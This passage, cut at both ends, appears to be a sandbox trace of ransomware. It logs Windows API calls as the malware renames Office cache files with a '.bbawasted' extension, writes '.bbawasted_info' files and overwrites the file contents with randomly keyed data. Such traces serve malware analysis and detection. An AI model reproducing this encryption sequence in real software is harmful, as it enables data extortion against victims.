lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.376] SetEndOfFile (hFile=0x114) returned 1 [0067.376] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.376] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.376] lstrcpyW (in: lpString1=0x5bab62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.bbawasted")) returned 1 [0067.379] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.379] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.379] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x5b1 [0067.379] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b1) returned 0x570000 [0067.379] CloseHandle (hObject=0x118) returned 1 [0067.383] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.384] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.384] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.384] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.385] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.385] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.393] SetEndOfFile (hFile=0x114) returned 1 [0067.395] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.395] CloseHandle (hObject=0x114) returned 1 [0067.396] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.396] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0328 | out: hHeap=0x580000) returned 1 [0067.396] _aulldvrm () returned 0x0 [0067.396] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.397] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.397] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.397] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0067.397] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b4) returned 0x5baab8 [0067.397] lstrcpyW (in: lpString1=0x5bab62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.397] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.397] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.398] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.398] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.398] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.399] WriteFile (in: hFile=0x114, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.400] SetEndOfFile (hFile=0x114) returned 1 [0067.400] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.400] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.400] lstrcpyW (in: lpString1=0x5bab62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.bbawasted")) returned 1 [0067.402] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.402] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.402] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x5b2 [0067.402] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b2) returned 0x570000 [0067.402] CloseHandle (hObject=0x11c) returned 1 [0067.404] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.405] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.405] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.405] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.406] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.406] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.414] SetEndOfFile (hFile=0x114) returned 1 [0067.416] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.416] CloseHandle (hObject=0x114) returned 1 [0067.418] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.418] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0430 | out: hHeap=0x580000) returned 1 [0067.418] _aulldvrm () returned 0x0 [0067.418] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.419] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.419] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.419] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0067.419] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5baab8 [0067.419] lstrcpyW (in: lpString1=0x5bab56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.419] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.419] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.420] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.420] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.420] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.420] WriteFile (in: hFile=0x114, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.421] SetEndOfFile (hFile=0x114) returned 1 [0067.421] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.421] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.421] lstrcpyW (in: lpString1=0x5bab56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.bbawasted")) returned 1 [0067.422] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.422] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.422] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x32b [0067.422] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b) returned 0x570000 [0067.422] CloseHandle (hObject=0x118) returned 1 [0067.427] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.429] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.429] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.429] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.430] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.430] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.438] SetEndOfFile (hFile=0x114) returned 1 [0067.440] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.440] CloseHandle (hObject=0x114) returned 1 [0067.442] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.442] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5befc0 | out: hHeap=0x580000) returned 1 [0067.442] _aulldvrm () returned 0x0 [0067.442] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.443] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.443] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.443] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.443] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5baab8 [0067.443] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.443] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.443] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.444] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.444] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.444] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.444] WriteFile (in: hFile=0x114, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.445] SetEndOfFile (hFile=0x114) returned 1 [0067.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.445] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.445] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.446] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.446] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.446] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x16fc [0067.446] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc) returned 0x570000 [0067.446] CloseHandle (hObject=0x11c) returned 1 [0067.449] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.450] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.450] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.450] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.450] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.450] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.459] SetEndOfFile (hFile=0x114) returned 1 [0067.461] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.461] CloseHandle (hObject=0x114) returned 1 [0067.462] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.462] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf0b8 | out: hHeap=0x580000) returned 1 [0067.462] _aulldvrm () returned 0x0 [0067.462] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.463] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.463] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.463] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0067.463] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ae) returned 0x5bf788 [0067.463] lstrcpyW (in: lpString1=0x5bf82c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.463] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bfa40 [0067.463] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.464] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bfa40 | out: pbBuffer=0x5bfa40) returned 1 [0067.464] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.464] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.465] WriteFile (in: hFile=0x114, lpBuffer=0x5bfa40*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bfa40*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.466] SetEndOfFile (hFile=0x114) returned 1 [0067.466] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.466] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfa40 | out: hHeap=0x580000) returned 1 [0067.466] lstrcpyW (in: lpString1=0x5bf82c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.bbawasted")) returned 1 [0067.466] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.467] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.467] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x567 [0067.467] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x567) returned 0x570000 [0067.467] CloseHandle (hObject=0x118) returned 1 [0067.471] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.472] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bab00 | out: pbBuffer=0x5bab00) returned 1 [0067.472] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.472] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.473] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.473] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.481] SetEndOfFile (hFile=0x114) returned 1 [0067.483] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.483] CloseHandle (hObject=0x114) returned 1 [0067.484] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.484] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf1b0 | out: hHeap=0x580000) returned 1 [0067.485] _aulldvrm () returned 0x0 [0067.485] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.485] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.485] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.485] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.485] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5baab8 [0067.485] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.485] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.485] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.486] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.486] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.486] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.487] WriteFile (in: hFile=0x114, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.487] SetEndOfFile (hFile=0x114) returned 1 [0067.488] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.488] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.488] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.489] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 